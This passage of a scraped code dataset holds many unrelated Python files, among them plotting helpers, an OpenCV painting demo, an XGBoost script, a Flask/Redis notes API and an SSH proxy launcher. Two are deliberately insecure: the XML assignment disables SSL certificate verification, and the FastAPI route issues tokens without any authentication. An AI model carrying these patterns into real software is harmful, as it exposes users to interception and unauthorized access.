shade=True, label='Test')\n    \n    ax2 = fig.add_subplot(grid[0, 2:])\n    ax2.set_title('Distribution of Median Values per Column', weight='bold')\n    sns.kdeplot(dfTrain.median(axis=0),color=cust_palt[0], shade=True, label='Train')\n    sns.kdeplot(dfTest.median(axis=0),color=cust_palt[1], shade=True, label='Test')\n    \n    ax3 = fig.add_subplot(grid[1, :2])\n    ax3.set_title('Distribution of Minimum Values per Column', weight='bold')\n    sns.kdeplot(dfTrain.min(axis=0),color=cust_palt[0], shade=True, label='Train')\n    sns.kdeplot(dfTest.min(axis=0),color=cust_palt[1], shade=True, label='Test')\n    \n    ax4 = fig.add_subplot(grid[1, 2:])\n    ax4.set_title('Distribution of Maximum Values per Column', weight='bold')\n    sns.kdeplot(dfTrain.max(axis=0),color=cust_palt[0], shade=True, label='Train')\n    sns.kdeplot(dfTest.max(axis=0),color=cust_palt[1], shade=True, label='Test')\n    \n    ax5 = fig.add_subplot(grid[2, :2])\n    ax5.set_title('Distribution of Std\\'s per Column', weight='bold')\n    sns.kdeplot(dfTrain.std(axis=0),color=cust_palt[0], shade=True, label='Train')\n    sns.kdeplot(dfTest.std(axis=0),color=cust_palt[1], shade=True, label='Test')\n    \n    ax6 = fig.add_subplot(grid[2, 2:])\n    ax6.set_title('Distribution of Variances per Column', weight='bold')\n    sns.kdeplot(dfTrain.var(axis=0),color=cust_palt[0], shade=True, label='Train')\n    sns.kdeplot(dfTest.var(axis=0),color=cust_palt[1], shade=True, label='Test')\n    \n    ax7 = fig.add_subplot(grid[3, :2])\n    ax7.set_title('Distribution of Skew Values per Column', weight='bold')\n    sns.kdeplot(dfTrain.skew(axis=0),color=cust_palt[0], shade=True, label='Train')\n    sns.kdeplot(dfTest.skew(axis=0),color=cust_palt[1], shade=True, label='Test')\n    \n    ax8 = fig.add_subplot(grid[3, 2:])\n    ax8.set_title('Distribution of Kurtosis Values per Column', weight='bold')\n    sns.kdeplot(dfTrain.kurtosis(axis=0),color=cust_palt[0], shade=True, label='Train')\n    sns.kdeplot(dfTest.kurtosis(axis=0),color=cust_palt[1], shade=True, label='Test')\n    \n    plt.suptitle('Meta Distributions of Train/Test Set', fontsize=25, weight='bold')\n    plt.show()\n    \n    return\n\n\n\n# Plot the distribution of each feature in df.\n# Optionally, df2 (test data) can be displayed alongside.\n# Make sure rows × columns matches the number of features in df.\ndef featDist(df, cols, rows=3, columns=3, figsize=(30,25), title=None, dfOpt=None):\n    \n    fig, axes = plt.subplots(rows, columns, figsize=figsize, constrained_layout=True)\n    axes = axes.flatten()\n\n    for i, j in zip(cols, axes):\n        sns.distplot(\n            df[i],\n            ax=j,\n            hist=False,\n            #color='#111d5e',\n            label=f'Train {i}',\n            kde_kws={'alpha':0.9}) \n        \n        if dfOpt is not None:\n            sns.distplot(\n                dfOpt[i],\n                ax=j,\n                hist=False,\n                color = '#c70039',\n                label=f'Test {i}',\n                kde_kws={'alpha':0.7})\n        \n        j.set_title('Train Test Dist of {0}'.format(i.capitalize()), weight='bold')\n    fig.suptitle(f'{title}', fontsize=24, weight='bold')\n\n    return\n\n\n\n# Plot the distribution of df together with a normal distribution fitted by maximum likelihood, to inspect the difference.\n# Optionally, df2 (test data) can be displayed alongside.\n# Make sure rows × columns matches the number of features in df.\n# To restrict the plot range, set domain = [xmin, xmax, ymin, ymax]\ndef featDistNorm(df, cols, rows=3, columns=3, figsize=(30,25), title=None, dfOpt=None, domain=None):\n    \n    fig, axes = plt.subplots(rows, columns, figsize=figsize, constrained_layout=True)\n    axes = axes.flatten()\n\n    for i, j in zip(cols, axes):\n        sns.distplot(\n            df[i],\n            ax=j,\n            fit=norm,\n            hist=False,\n            #color='#111d5e',\n            label=f'Train {i}',\n            kde_kws={'alpha':0.9}) \n        \n        if dfOpt is not None:\n            sns.distplot(\n                dfOpt[i],\n                ax=j,\n                hist=False,\n                color = '#c70039',\n                label=f'Test {i}',\n                kde_kws={'alpha':0.7})\n        \n        if domain is not None:\n            j.axis(domain)\n        \n        (mu, sigma) = 
norm.fit(df[i])\n        j.set_title('Train Test Dist of {0} Norm Fit: $\\mu=${1:.2g}, $\\sigma=${2:.2f}'.format(i.capitalize(), mu, sigma), weight='bold')\n    fig.suptitle(f'{title}', fontsize=24, weight='bold')\n    \n    return\n\n\n# Plot a heatmap of the correlations\n#in: a data frame created by df.corr()\ndef corrHeatMap(correlation):\n    mask = np.triu(correlation)\n    plt.figure(figsize=(30, 12))\n    sns.heatmap(correlation,\n                mask=mask,\n                annot=True,\n                fmt='.3f',\n                cmap='Wistia',\n                linewidths=0.05,\n                cbar=True)\n    \n    \n    plt.title('Features with Highest Correlations', weight='bold')\n    plt.show()\n    return\n\n\n\n# Dimensionality reduction of the data by PCA\n# Pareto chart of the PCA result\n#in :dfTrain, dfTest, Rank: how many top components to show (the number of bars)\ndef parateResultPCA(dfTrain, dfTest, Rank=None):\n    # Transform the vectors by principal component analysis\n    pca = PCA()\n    pca.fit(dfTrain.iloc[:,1:])\n    pcaTrain = pca.transform(dfTrain.iloc[:,1:])\n    pcaTest = pca.transform(dfTest.iloc[:,1:])\n    \n    # Pareto chart\n    fig, ax = plt.subplots(1,1,figsize=(30, 12))\n    ax.plot(range(dfTrain.iloc[:,1:].shape[1]), pca.explained_variance_ratio_.cumsum(), linestyle='--',\n            drawstyle='steps-mid', color=cust_palt[1], label='Cumulative Explained Variance')\n    sns.barplot(np.arange(1,dfTrain.iloc[:,1:].shape[1]+1), pca.explained_variance_ratio_, alpha=0.85, color=cust_palt[0],\n                label='Individual Explained Variance', ax=ax)\n    ax.set_ylabel('Explained Variance Ratio', fontsize = 14)\n    \n    # Restrict the range ([0,Rank-1,0,1])\n    if Rank is None:\n        ax.set_title('Explained Variance', fontsize = 20, weight='bold')\n        ax.set_xlabel('Number of Principal Components', fontsize = 14)\n        plt.legend(loc='center right', fontsize = 13);\n        ax.set_xticks([])\n    else:\n        ax.axis([0,Rank-1,0,1])\n        ax.set_title('First ' + str(Rank) + ' Explained Variances', fontsize = 20, weight='bold')\n        ax.set_xlabel('Number of Principal Components', fontsize = 14)\n    \n    plt.tight_layout()\n    \n    return\n\n\n# Plot a chart for every pairwise combination of PCA components (colored by the corresponding column)\n#in :fitted PCA model, PCA-transformed train data, raw train data, name of the column used for coloring\n#NOTE: the chart is drawn as a matrix of (number of pcaTrain columns)^2 panels, so reduce the dimensionality beforehand\ndef distVarianceforClmn(pca, pcaTrain, Train, colorClmn):\n    total_var = pca.explained_variance_ratio_.sum() * 100\n    labels = {\n        str(i): f\"PC {i+1} ({var:.1f}%)\"\n        for i, var in enumerate(pca.explained_variance_ratio_ * 100)\n    }\n    \n    fig = px.scatter_matrix(\n        pcaTrain,\n        color=Train.iloc[:,1:][colorClmn],\n        dimensions=range(pcaTrain.shape[1]),\n        labels=labels,\n        title=f'Total Explained Variance: {total_var:.2f}% vs ' + colorClmn,\n        opacity=0.5,\n        color_discrete_sequence=cust_palt[:pcaTrain.shape[1]],\n    )\n    fig.update_traces(diagonal_visible=False)\n    fig.show()\n    return","sub_path":"starter_210322/module/tidalUtl/VslUtl.py","file_name":"VslUtl.py","file_ext":"py","file_size_in_byte":10789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"432738413","text":"\"\"\"project 1 Virtual Painting\"\"\"\n\nimport cv2 as cv\nimport numpy as np\n\n\ncap = cv.VideoCapture(0)\ncap.set(3,640)\ncap.set(4,480)\ncap.set(10,100)\n#red, orange, green\nmyColors = [[108, 119, 0, 179, 189, 255],\n            [0,105,35,7,166,255],\n            [46, 80, 0, 96, 176, 255]]\n     #yellow [23,31,0,57,102,255]\n\nmyColorValues = [[0,17,255],[0,128,255],[26,255,0]]\n\n\nmyPoints = [] #[x, y, colorID]\n\ndef drawer(myPoints, myColorValues):\n    for point in myPoints:\n        cv.circle(imgResult,(point[0],point[1]),10,myColorValues[point[2]],cv.FILLED)\n\n\n\n\ndef findColor(img, myColors, myColorValues):\n    imgHSV = cv.cvtColor(img,cv.COLOR_BGR2HSV)\n    count = 0\n    newPoints = []\n    for color in myColors:\n        lower = np.array(color[0:3])\n        upper = np.array(color[3:6])\n        mask = 
cv.inRange(imgHSV,lower,upper)\n        x, y = getContours(mask)\n        cv.circle(imgResult,(x,y),10,myColorValues[count],cv.FILLED)\n        if x!= 0 and y!=0:\n            newPoints.append([x,y,count])\n\n        count += 1\n    return newPoints\n    #cv.imshow(str(color[0]),mask)\ndef getContours(img):\n\n    #external - RETR_EXTERNAL retrieves only the outer contours\n    #approx chain - CHAIN_APPROX_NONE gives every contour point without compression\n\n    contours, hierarchy = cv.findContours(img,cv.RETR_EXTERNAL, cv.CHAIN_APPROX_NONE)\n    x, y, w, h = 0, 0, 0, 0\n    for cnt in contours:\n        area = cv.contourArea(cnt)\n        #contourIdx of -1 draws all the contours\n        if area >500:\n            cv.drawContours(imgResult, cnt, -1, (252, 132, 3), 3)\n            perimeter = cv.arcLength(cnt,True) #True because the contour is closed\n\n            #approximate the corner points\n            approx = cv.approxPolyDP(cnt, 0.02*perimeter, True)\n            x, y , w, h = cv.boundingRect(approx)\n    return x+w//2, y\n\nwhile True:\n    success, img = cap.read()\n    imgResult = img.copy()\n    newPoints = findColor(img, myColors, myColorValues)\n    if len(newPoints) != 0:\n        for newP in newPoints:\n            myPoints.append(newP)\n\n    if len(myPoints) != 0:\n        drawer(myPoints,myColorValues)\n\n    cv.imshow('WebCam',imgResult)\n\n    if cv.waitKey(1) & 0xFF == ord('q'):\n        break\n\n\n\n# Start from 2:10 in the video\n","sub_path":"YouTube_OpenCV_3_Hours_Course/project1.py","file_name":"project1.py","file_ext":"py","file_size_in_byte":2164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"430757194","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCV of station features on cluster\n\"\"\"\n\nimport sys\nsys.path.insert(0, 'bosch_helper')\nfrom bosch_helper import *\n\n#%% Load data\nx = pd.read_hdf('numeric_b1_b7_nf149.hdf', 'numeric')\ny_train = pd.read_hdf('numeric_b1_b7_nf149.hdf', 'y_train')\n\ntime_station = pd.read_hdf('time_station.hdf', 'time_station')\n\nx = x.join(time_station)\n\nx_train = x.loc['train']\n#x_train = x_train.iloc[:, :30]\nx_test = x.loc['test']\n#x_test = x_test.iloc[:, :30]\n\n#%% CV\nparams = {'max_depth':14, 'eta':0.03, 'silent':1, 'objective':'binary:logistic', 'nthread':20,\n          'lambda':4, 'subsample':0.9, 'min_child_weight':5, 'booster':'gbtree', 'alpha':0,\n          'base_score':0.0058, 'colsample_bytree':0.6}\n\ncv_results, clfs, running_time = \\\n    cross_val_predict_skf_rm_xgb(params, x_train, y_train, \n                                 num_boost_round=80, n_splits=5, \n                                 n_repeats=3, random_state=5870577, \n                                 verbose_eval=True)\n\nresults = {'clfs_cv': clfs, \n           'results_cv': cv_results, \n           'running_time_cv': running_time}\n\n#%% CV results\ncv_train_mean = cv_results['train'].mean(axis=1)\ncv_train_std = cv_results['train'].std(axis=1)\ncv_test_mean = cv_results['test'].mean(axis=1)\ncv_test_std = cv_results['test'].std(axis=1)\n\n#plt.figure(figsize=(14, 7))\n#plt.plot(np.arange(len(cv_train_mean)), cv_train_mean)\n#plt.fill_between(np.arange(len(cv_train_mean)), cv_train_mean-cv_train_std, cv_train_mean+cv_train_std, alpha=0.5)\n#plt.plot(np.arange(len(cv_train_mean)), cv_test_mean)\n#plt.fill_between(np.arange(len(cv_test_mean)), cv_test_mean-cv_test_std, cv_test_mean+cv_test_std, alpha=0.5)\n#plt.legend(['train', 'test'])\n\n#%% Train data model\ndtrain = xgb.DMatrix(x_train, label=y_train)\nparams['seed'] = 587359\nclf = xgb.train(params, dtrain, \n                num_boost_round=60,\n                feval=mcc_eval, \n                evals=[(dtrain, 'train')])\n\ny_train_pred = clf.predict(dtrain)\n\n# Find best threshold \nthresholds = np.linspace(0.01, 0.99, 400)\nmcc = np.array([matthews_corrcoef(y_train, y_train_pred>thr) \n                for thr in thresholds])\n#plt.plot(thresholds, mcc)\nbest_threshold = 
thresholds[mcc.argmax()]\n\nprint('Optimal MCC = {:.3f}'.format(mcc.max()))\nprint('Optimal threshold = {:.3f}'.format(best_threshold))\n\nresults['best_threshold_train'] = best_threshold\nresults['mcc_max_train'] = mcc.max()\nresults['clf_train'] = clf\n\n#%% Predict on test data\ndtest = xgb.DMatrix(x_test)\ny_test_pred = clf.predict(dtest)\ny_test_pred_int = (y_test_pred>best_threshold).astype(int)\n\nsub = pd.read_csv(\"sample_submission.csv.zip\", index_col=0)\nsub[\"Response\"] = y_test_pred_int\nsub.to_csv(\"benchmark_8_submission_cv_6_station.csv.gz\", compression=\"gzip\")\n\nsave_pickle(results, 'results_benchmark_8_cv_6_station.pickle')","sub_path":"benchmark_features/benchmark_8/cv6/benchmark_8_numeric_features_CV_6_stations.py","file_name":"benchmark_8_numeric_features_CV_6_stations.py","file_ext":"py","file_size_in_byte":2694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"439363869","text":"import os\nimport time\nimport sys\n\n\n\t\ndef file_combine(file_boot,file_app,file_all):\n\tfs_boot = open(file_boot,'rb')\n\tfs_app = open(file_app,'rb')\n\tfs_all = open(file_all,'wb')\n\tboot_data = fs_boot.read()\n\tboot_extra_data = []\n\tapp_data = fs_app.read()\n\tboot_size = os.path.getsize(file_boot)\n\tapp_size = os.path.getsize(file_app)\n\tfs_all.write(boot_data)\n\textra_data_len = 0x10000 - boot_size\n\tprint(extra_data_len)\n\tfor i in range(extra_data_len):\n\t\tboot_extra_data.append(0xff)\n\tprint(len(boot_extra_data))\n\tfs_all.write(bytes(boot_extra_data))\t\n\tfs_all.write(app_data)\t\n\t\nif __name__ == '__main__':\n\tprint(sys.argv[1])\n\tprint(sys.argv[2])\n\tprint(sys.argv[3])\n\tfile_combine(sys.argv[1],sys.argv[2],sys.argv[3])\n\n\t\n\n\t\n\t","sub_path":"boot_app_file_combine/boot_app_combine.py","file_name":"boot_app_combine.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"116818494","text":"class optimal_sol():\r\n    # the logic here is that if the numbers are sorted and not missing any element in between, then\r\n    # the difference between the numbers and their indices should be the same\r\n    # ex: a=[1,2,3,4,5,6,7], low =0, high =6 mid element is a[3]=4 and a[low]=1 and a[high] = 7\r\n    #a[3]-3=1 and a[4]-4=1 and a[0]-0=1\r\n    def missing_number(self,a):\r\n        low= 0\r\n        high = len(a)-1\r\n\r\n        while high - low >=2 : #search until only 2 numbers are left\r\n            mid = (low + high) // 2\r\n            middiff = a[mid] - mid\r\n            lowdiff = a[low]-low\r\n            #highdiff = a[high]-high\r\n            if (middiff != lowdiff): #left part has missing number\r\n                high=mid\r\n            else:\r\n                low=mid #right part has missing number\r\n        return (a[low] + a[high])/2\r\nclass Solution(object):\r\n    def missingNumber(self, nums):\r\n        \"\"\"\r\n        :type nums: List[int]\r\n        :rtype: int\r\n        \"\"\"\r\n        self.nums=nums\r\n        self.n=max(self.nums)\r\n        #print(self.n,len(nums))\r\n        sum_n=(self.n*((self.n)+1))/2\r\n        sum_arr = sum(self.nums)\r\n        dif = sum_n - sum_arr\r\n        return dif\r\n        #print(sum_n,sum_arr)\r\n\r\n\r\n\r\na=[2,3,4,6,7,8,9]\r\nf= optimal_sol()\r\nprint(f.missing_number(a))\r\n\r\n\r\n\r\n","sub_path":"problem 11.py","file_name":"problem 11.py","file_ext":"py","file_size_in_byte":1295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"222561163","text":"from fastapi import APIRouter, status\nfrom app.services.auth import auth\n\n# Setup Router\nrouter = APIRouter()\n\n# Handle the token request\n@router.get('/', 
status_code=status.HTTP_200_OK)\nasync def get_token():\n email:str ='user@test.com'\n access_token = auth.get_access_token(email)\n return {'token': access_token}","sub_path":"app/views/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"50857585","text":"import xlrd\r\nfrom xlutils.copy import copy\r\n\r\ndef cdfindbalance():\r\n tbook=xlrd.open_workbook(\"accounts.xlt\") #reading testxlrd.xlsx file which is in same folder\r\n tsheet=tbook.sheet_by_index(0) #assigning sheet with index=0 i.e., 1st sheet to object:sheet \r\n total_rows=tsheet.nrows\r\n total_cols=tsheet.ncols\r\n dtemp=0\r\n ctemp=0\r\n for i in range(0,total_rows):\r\n dtemp=dtemp+tsheet.cell(i,1).value\r\n ctemp=ctemp+tsheet.cell(i,2).value\r\n print(dtemp)\r\n print(ctemp)\r\n if(dtemp==ctemp):\r\n print(\"credit and debit equal\")\r\n else:\r\n print(\"credit and debit not equal\")\r\ndef findbalance():\r\n tbook=xlrd.open_workbook(\"accounts.xlt\") #reading testxlrd.xlsx file which is in same folder\r\n tsheet=tbook.sheet_by_index(0) #assigning sheet with index=0 i.e., 1st sheet to object:sheet \r\n total_rows=tsheet.nrows\r\n total_cols=tsheet.ncols\r\n wb=copy(tbook)\r\n w_sheet = wb.get_sheet(0)\r\n for i in range(0,total_rows):\r\n temp=tsheet.cell(i,1).value-tsheet.cell(i,2).value\r\n tempbalance=tsheet.cell(i,3).value+temp\r\n w_sheet.write(i,3,tempbalance)\r\n wb.save('accounts.xlt')\r\ndef alplbalance():\r\n tbook=xlrd.open_workbook(\"accounts.xlt\") #reading testxlrd.xlsx file which is in same folder\r\n tsheet=tbook.sheet_by_index(0) #assigning sheet with index=0 i.e., 1st sheet to object:sheet \r\n total_rows=tsheet.nrows\r\n total_cols=tsheet.ncols\r\n altemp=0\r\n pltemp=0\r\n for i in range(0,total_rows):\r\n if i < 29:\r\n altemp=altemp+tsheet.cell(i,3).value\r\n else:\r\n pltemp=pltemp+tsheet.cell(i,3).value\r\n print(altemp)\r\n print(pltemp)\r\ndef findprofitorloss():\r\n profit=0\r\n loss=0\r\n asset=0\r\n liability=0\r\n tbook=xlrd.open_workbook(\"accounts.xlt\",\"a\") #reading testxlrd.xlsx file which is in same folder\r\n tsheet=tbook.sheet_by_index(0) #assigning sheet with index=0 i.e., 1st sheet to object:sheet \r\n total_rows=tsheet.nrows\r\n for i in range(32,36):\r\n profit=profit+tsheet.cell(i,3).value\r\n for i in range(37,42):\r\n loss=loss+tsheet.cell(i,3).value\r\n for i in range(3,13):\r\n asset=asset+tsheet.cell(i,3).value\r\n for i in range(15,29):\r\n liability=liability+tsheet.cell(i,3).value\r\n print(profit,loss,asset,liability)\r\n if (profit>loss and asset>liability):\r\n print('profit')\r\n else:\r\n print('loss')\r\n ","sub_path":"accountss_22735/findbalance.py","file_name":"findbalance.py","file_ext":"py","file_size_in_byte":2446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"185711675","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport sys\nif __name__ == '__main__':\n s = input(\"Введите предложение: \")\n n = int(input(\"Введите длину: \"))\n if len(s) >= n:\n print(\"Заданная длина должна быть больше длины предложения\",file=sys.stderr)\n exit(1)\n words = s.split(' ')\n if len(words) < 2:\n print(\"Предложение должно содержать несколько слов\",file=sys.stderr)\n exit(1)\n delta = n\n for word in words:\n delta -= len(word)\n w, r = delta // (len(words) - 1), delta % (len(words) - 1)\n lst = []\n for i, word in enumerate(words):\n lst.append(word)\n if i < len(words) - 1:\n width = 
w\n if r > 0:\n width += 1\n r -= 1\n if width > 0:\n lst.append(' ' * width)\n print(''.join(lst))\n","sub_path":"Задания/Пример3.py","file_name":"Пример3.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"282304674","text":"import urllib.request, urllib.parse, urllib.error\nimport xml.etree.ElementTree as ET\nimport ssl\n\n# Ignore SSL certificate errors\nctx = ssl.create_default_context()\nctx.check_hostname = False\nctx.verify_mode = ssl.CERT_NONE\n\nurl = input('Enter location: ')\ntotal = 0\nprint('Retrieving', url)\ndata = urllib.request.urlopen(url, context=ctx).read()\nprint('Retrieved', len(data), 'characters')\ndata = ET.fromstring(data)\ndata = data.findall('.//comment')\ncounts = list()\nfor item in data :\n counts.append(item.find('count').text)\nprint('Count:', len(counts))\n\ntotal = 0\nfor count in counts :\n count = int(count)\n total = total + count\nprint('Sum:', total)\n","sub_path":"Course3/Assignment13.1.py","file_name":"Assignment13.1.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"127349293","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nButterfly - A sleek web based terminal emulator\n\"\"\"\nimport os\nimport re\nfrom setuptools import setup\n\nROOT = os.path.dirname(__file__)\nwith open(os.path.join(ROOT, 'butterfly', '__init__.py')) as fd:\n __version__ = re.search(\"__version__ = '([^']+)'\", fd.read()).group(1)\n\noptions = dict(\n name=\"butterfly-workspace\",\n version=__version__,\n description=\"A sleek web based terminal emulator (forked for Workspace)\",\n long_description=\"See http://github.com/angl/butterfly\",\n author=\"Florian Mounier\",\n author_email=\"paradoxxx.zero@gmail.com\",\n url=\"http://github.com/paradoxxxzero/butterfly\",\n license=\"GPLv3\",\n platforms=\"Any\",\n scripts=['butterfly.server.py', 'scripts/butterfly', 'scripts/b'],\n packages=['butterfly'],\n install_requires=[\"tornado>=3.2\", \"pyOpenSSL\", 'tornado_systemd'],\n extras_requires=[\"libsass\"],\n package_data={\n 'butterfly': [\n 'sass/*.sass',\n 'themes/*.*',\n 'themes/*/*.*',\n 'themes/*/*/*.*',\n 'static/fonts/*',\n 'static/images/favicon.png',\n 'static/main.css',\n 'static/html-sanitizer.js',\n 'static/*.min.js',\n 'templates/index.html',\n 'bin/*',\n 'templates/motd',\n 'butterfly.conf.default'\n ]\n },\n classifiers=[\n \"Development Status :: 4 - Beta\",\n \"Intended Audience :: Developers\",\n \"License :: OSI Approved :: GNU General Public License v3 (GPLv3)\",\n \"Operating System :: POSIX :: Linux\",\n \"Programming Language :: Python :: 2\",\n \"Programming Language :: Python :: 3\",\n \"Topic :: Terminals\"])\n\nsetup(**options)\n","sub_path":"pypi_install_script/butterfly-workspace-3.0.4.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"290709324","text":"import json\nimport redis\nimport string\nfrom flask import Flask, request, jsonify, render_template\nfrom model import Note\n\n\napp = Flask('todopi')\nrds = redis.StrictRedis(host='localhost', port=6379, db=0)\npriorities=string.ascii_uppercase\n\n\ndef save_note(note):\n # add note to hash with note ID as key\n rds.hmset(note.uid, Note.dict_repr(note))\n # add note ID to index list\n rds.lpush('notes', note.uid)\n\n\ndef get_notes(sort_by='priority', 
fmt=None):\n notes = []\n\n indices = rds.lrange('notes', 0, -1)\n app.logger.debug(\"found %d note IDs in index\" % len(indices))\n\n for index in indices:\n notes.append(Note(**rds.hgetall(index)))\n\n notes = Note.sort(notes, sort_by=sort_by)\n\n if fmt == 'json':\n notes = { 'notes': Note.dict_repr(notes) }\n\n return notes\n\n\n@app.route(\"/\")\ndef notes():\n sort_by = request.args.get('sort_by', 'priority')\n app.logger.debug(\"sort notes by: %s\" % sort_by)\n\n if 'html' in request.headers.get('accept'):\n return render_template('notes.html',\n notes=get_notes(sort_by=sort_by),\n priorities=priorities)\n else:\n return jsonify(get_notes(sort_by=sort_by, fmt='json'))\n\n\n@app.route(\"/save\", methods=['POST'])\ndef save():\n req = request.get_json()\n app.logger.debug(req)\n if req.get('content') is None or req.get('priority') not in priorities:\n return \"\", 400\n\n save_note(Note(**{\n 'content': req.get('content'),\n 'priority': req.get('priority'),\n 'project': req.get('project'),\n 'context': req.get('context')\n }))\n return \"\", 204\n\n\nif __name__ == \"__main__\":\n app.run(debug=True, host='127.0.0.1')\n","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"14061356","text":"#!/usr/bin/env python\n\nimport sys\nimport time\nimport argparse\nfrom subprocess import call\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--name', '-n', required=True, type=str, help='Name of the cluster.')\nparser.add_argument('--zone', '-z', required=False, type=str, default='us-central1-b', help='Zone of the cluster.')\nparser.add_argument('--notebook', '--nb', action='store_true')\nargs = parser.parse_args()\n\ncmd = ' '.join([\n 'gcloud compute ssh',\n '{}'.format(args.name + '-m'),\n '--zone={}'.format(args.zone),\n '--ssh-flag=\"-D 10000 -N -f -n\"',\n '> /dev/null 2>&1 &'\n])\ncall(cmd, shell=True)\n\n# if notebook flag, open connection to 8123, otherwise open to 4040 (Spark UI)\nif args.notebook:\n port = '8123'\nelse:\n port = '4040'\n\n# wait\ntime.sleep(2)\n\n# open Chrome with SOCKS proxy configuration\nbrowser_exec = r'/Applications/Google\\ Chrome.app/Contents/MacOS/Google\\ Chrome'\ncmd = ' '.join([\n browser_exec,\n 'http://localhost:{}'.format(port),\n '--proxy-server=\"socks5://localhost:10000\"',\n '--host-resolver-rules=\"MAP * 0.0.0.0 , EXCLUDE localhost\"',\n '--user-data-dir=/tmp/',\n '> /dev/null 2>&1 &'\n])\ncall(cmd, shell=True)\n","sub_path":"connect_cluster.py","file_name":"connect_cluster.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"648259143","text":"print('-'*30)\nprint('LOJA SUPER BARATÃO')\nprint('-'*30)\n\ntotal = maior1000 = preco = 0\nnome_menor = ' '\n\nwhile True:\n continuar = ' '\n nome = input('Nome do Produto:')\n preco = float(input('Preço: R$'))\n total += preco\n if preco > 1000:\n maior1000 += 1\n if preco == total:\n menor = preco\n nome_menor = nome\n if preco < menor:\n menor = preco\n nome_menor = nome\n while continuar not in ('SN'):\n continuar = input('Quer continuar? 
[S/N] ').upper().strip()[0]\n if continuar == 'N':\n break\nprint('--------- FIM DO PROGRAMA ----------- ')\nprint(f'O total da compra foi de R${total:.2f}')\nprint(f'Temos {maior1000} produtos custando mais de R$ 1000.00')\nprint(f'O produto mais barato foi {nome_menor} que custa R${menor:.2f}')","sub_path":"ex070.py","file_name":"ex070.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"374651181","text":"import pytest\nfrom sqlalchemy import (\n Column,\n Integer,\n MetaData,\n String,\n Table,\n create_engine,\n insert,\n)\n\nfrom exasol.driver.odbc import (\n ODBC_DRIVER,\n odbcconfig,\n)\n\n\n@pytest.fixture\ndef pyodbc_connection_string(exasol_config):\n config = exasol_config\n return (\n f\"exa+pyodbc://{config.username}:{config.password}@{config.host}:{config.port}/\"\n f\"?DEFAULTPARAMSIZE=200&INTTYPESINRESULTSIFPOSSIBLE=y\"\n \"&FINGERPRINT=NOCERTCHECK&CONNECTIONLCALL=en_US.UTF-8&driver=EXAODBC\"\n )\n\n\n@pytest.fixture()\ndef test_schema(control_connection):\n connection = control_connection\n schema = \"REGRESSION_335\"\n connection.execute(f\"CREATE SCHEMA {schema}\")\n connection.commit()\n yield schema\n connection.execute(f\"DROP SCHEMA IF EXISTS {schema} CASCADE\")\n connection.commit()\n\n\n@pytest.fixture()\ndef users_table(control_connection, test_schema):\n connection = control_connection\n table_name = \"users\"\n connection.execute(\n f\"create table {test_schema}.{table_name} (id DECIMAL(18) identity primary key, name VARCHAR(2000) UTF8)\"\n )\n connection.commit()\n yield test_schema, table_name\n\n\ndef test_lastrowid_does_not_create_extra_commit(\n exasol_config, users_table, pyodbc_connection_string\n):\n \"\"\"\n For further details on this regression see `Issue-335 `_.\n \"\"\"\n schema_name, table_name = users_table\n metadata = MetaData()\n engine = create_engine(pyodbc_connection_string)\n\n table = Table(\n table_name,\n metadata,\n Column(\"id\", Integer, primary_key=True),\n Column(\"name\", String(2000)),\n schema=schema_name,\n )\n\n with odbcconfig(ODBC_DRIVER):\n conn = engine.connect()\n trans = conn.begin()\n\n # Insert without an explicit ID will trigger a call to `get_lastrowid`\n # which in turn cause the unintended autocommit\n insert_statement = insert(table).values(name=\"Gandalf\")\n conn.execute(insert_statement)\n trans.rollback()\n\n result = conn.execute(f\"SELECT * FROM {schema_name}.{table_name};\").fetchall()\n conn.close()\n\n assert len(result) == 0\n","sub_path":"test/integration/regression/test_regression_bug335.py","file_name":"test_regression_bug335.py","file_ext":"py","file_size_in_byte":2226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"599750449","text":"#!/usr/bin/env python\n\nimport os\nimport sys\nfrom setuptools import setup, find_packages\nfrom fnmatch import fnmatchcase\nfrom distutils.util import convert_path\n\ndef read(fname):\n return open(os.path.join(os.path.dirname(__file__), fname)).read()\n\nstandard_exclude = ('*.py', '*.pyc', '*~', '.*', '*.bak', '*.swp*')\nstandard_exclude_directories = ('.*', 'CVS', '_darcs', './build', './dist', 'EGG-INFO', '*.egg-info')\ndef find_package_data(where='.', package='', exclude=standard_exclude, exclude_directories=standard_exclude_directories):\n out = {}\n stack = [(convert_path(where), '', package)]\n while stack:\n where, prefix, package = stack.pop(0)\n for name in os.listdir(where):\n fn = os.path.join(where, 
